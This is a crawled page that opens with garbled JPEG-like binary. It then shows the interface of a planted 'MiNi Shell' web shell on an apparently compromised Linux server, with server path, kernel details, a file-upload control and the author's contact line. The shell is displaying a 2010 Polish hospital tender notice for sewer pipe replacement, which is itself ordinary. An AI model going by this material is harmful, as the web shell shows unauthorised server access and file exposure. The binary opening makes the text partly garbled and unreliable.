JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100126/22462-N-2010.html

<p class="kh_header"><b>Inowrocław: Przetarg nieograniczony nr M-4/2010</b><br>
<b>Numer ogłoszenia: 22462 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr M-4/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie wymiany odcinkowej poziomów kanalizacji sanitarnej w budynku głównym Szpitala Powiatowego w Inowrocławiu, 
2.	Szczegółowy opis  przedmiotu zamówienia został  określony w przedmiarze robót,  który  stanowi załącznik  Nr  2   do niniejszej specyfikacji.rzy ul. Poznańskiej 97..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.10-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Wadium można wnosić w następujących formach :
-	pieniądzu,
-	poręczeniach bankowych, lub poręczeniach pieniężnych spółdzielczej kasy oszczędnościowo - kredytowej, 
-	gwarancjach bankowych,
-	gwarancjach ubezpieczeniowych,
-	poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 
-	pkt. 2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
2. Wysokość wadium ustala się w  następującej kwocie:
1.530,00 zł (słownie jeden tysiąc pięćset trzydzieści  złotych  00/100)
1) miejsce wnoszenia wadium w pieniądzu :
 - Bank :  Kredyt Bank PBI S.A. O/Bydgoszcz
  		  Nr rachunku: 88150013601213600244300000
3  Wadium wnoszone w pieniądzu należy wpłacać  przelewem na wskazane konto, wnoszone
    w papierach wartościowych, oryginały papierów (gwarancje, poręczenia ) należy
    zdeponować w kasie lub dołączyć do oferty. W przypadku zdeponowania w kasie kopia
    winna być dołączona do oferty.
    Zamawiający uzna za wadium wniesione przelewem w pieniądzu, jeżeli pieniądze zostały
    zaliczone na rachunku Zamawiającego.
4.  Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
      Zamawiający przekaże do banku niezwłocznie po:
a)	wyborze najkorzystniejszej oferty,
b)	zawarciu umowy w sprawie zamówienia publicznego ,
c)	unieważnieniu postępowania o udzielenie niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą
-z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp.
          oraz niezwłocznie  na wniosek Wykonawcy , który wycofał ofertę przed upływem 
          terminu      spływania ofert.

5. wadium Wykonawca utraci jeżeli :
a)	odmówi podpisania umowy na warunkach określonych w ofercie,
b)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
c)	W odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, Wykonawca nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
6. Termin wnoszenia wadium: do dnia 15.02.2010 r.   do godziny  9.30.
           Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwróci                    
           je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty   
           postępowania bankowego.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia  mogą ubiegać się wykonawcy którzy spełniają warunki  dotyczące  :

a)	posiadania uprawnień do wykonywania określonej w przedmiocie zamówienia działalności lub czynności ; jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;   
b)	posiadania  wiedzy i doświadczenia,
c)	dysponowania odpowiednim  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
d)	 sytuacji ekonomicznej i finansowej .

2.W celu wykazania spełniania warunków  , o których mowa powyżej Wykonawca
    zobowiązany jest dołączyć do oferty następujące dokumenty :
a)	decyzja - zezwolenie na prowadzenie działalności w zakresie prowadzenia robót instalacyjnych
b)	wykaz  robót instalacyjnych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia , wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu , a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie , z podaniem ich rodzaju i wartości , daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego , że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Zamawiający dokona oceny spełniania warunków na podstawie złożonych dokumentów, które zostały opisane w pkt.  VI.2..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia   wykonawcy, w okolicznościach o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych (Dz.U. z 2007r  Nr.223,poz .1655 ze zmianami). Wykonawca załączy do oferty następujące oświadczenia i dokumenty :

a)	Oświadczenie o braku podstaw do wykluczenia ( Załącznik nr 3 -wzór).
b)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
c)	aktualne( wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert)  zaświadczenie z właściwego urzędu skarbowego o braku zaległości podatkowych - oryginał lub kserokopia potwierdzona za zgodność z oryginałem przez oferenta,
d)	aktualne( wystawione nie wcześniej niż 3 miesiące przed terminem składania ofert) zaświadczenie z właściwego Zakładu Ubezpieczeń Społecznych o braku zaległości w płaceniu składek na ubezpieczenie społeczne - oryginał lub kserokopia potwierdzona za zgodność z oryginałem przez oferenta,
e)	Aktualna informacja z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Prawo zamówień publicznych - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f)	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.   Jeżeli Wykonawca  wykazując spełnianie warunków, o których mowa w art.22 ust.
     Ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26
      ust. 2 b ustawy Pzp , Zamawiający żąda wykazania za pomocą dokumentów
      wymienionych wyżej (pkt. VII a-f SIWZ)  , iż w stosunku do tych podmiotów  nie
       zachodzą okoliczności wskazane  w art. 24 ust. 1 ustawy Pzp. 

3.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
    Rzeczypospolitej Polskiej zamiast dokumentów o których mowa w Dziale: 
    VII p.1 b,c,d,f, SIWZ - składa się dokument lub dokumenty, wystawione w kraju, w   którym  ma  siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
       3.1.1. nie otwarto jego likwidacji ani nie ogłoszono upadłości
 3.1.2. nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
       3.1.3.nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
       3.1.4.litera e- składa zaświadczenie właściwego organu sądowego lub administracyjnego
                  miejsca zamieszkania albo zamieszkania osoby , której dokumenty dotyczą , w
                  zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
4. Oświadczenia należy składać w formie pisemnej,
5. Dokumenty mogą być składane w formie oryginału lub kopii poświadczonych za zgodność
    z oryginałem przez wykonawcę ( dokumenty sporządzone w języku obcym są składane
    wraz z tłumaczeniem na język polski poświadczonym przez wykonawcę).

Ponadto do oferty należy dołączyć:
1)	Oświadczenia:
a)	o sposobie realizacji zamówienia tj. wyłącznie siłami własnymi lub przy użyciu podwykonawców (wymienić podwykonawców, jeżeli dotyczy),
b)	o okresie gwarancji jakości  i okresie rękojmi za wady (min 24  miesiące ),
c)	o uporządkowaniu terenu po zakończeniu robót,
d)	o ubezpieczeniu robót od odpowiedzialności cywilnej,
e)	 o zaakceptowaniu warunków zapłaty określonych w pkt. III.6. niniejszej specyfikacji,
f)	Podmiotu/ów oddających do dyspozycji zasoby ,potencjał ,osoby (zgodnie z art. 26 ustawy  Pzp) na okres korzystania z nich podczas wykonywania zamówienia
2) Wypełniony załącznik nr 1 (Oferta)..
3)  Oświadczenie  o braku podstaw do wykluczenia  (wzór - zał. nr 3 do SIWZ).
4)  Kosztorys ofertowy w formie uproszczonej .
5) wykaz materiałów
6) dowód wniesienia wadium.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.lo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Powiatowy w Inowrocławiu 88-100,ul.Poznańska 97,Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 09:30, miejsce: Sekretariat Z-cy Dyrektora ds Techniczno-Administracyjnych -PS  ZOZ ,ul.Poznańska 97,88-100 Inowrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com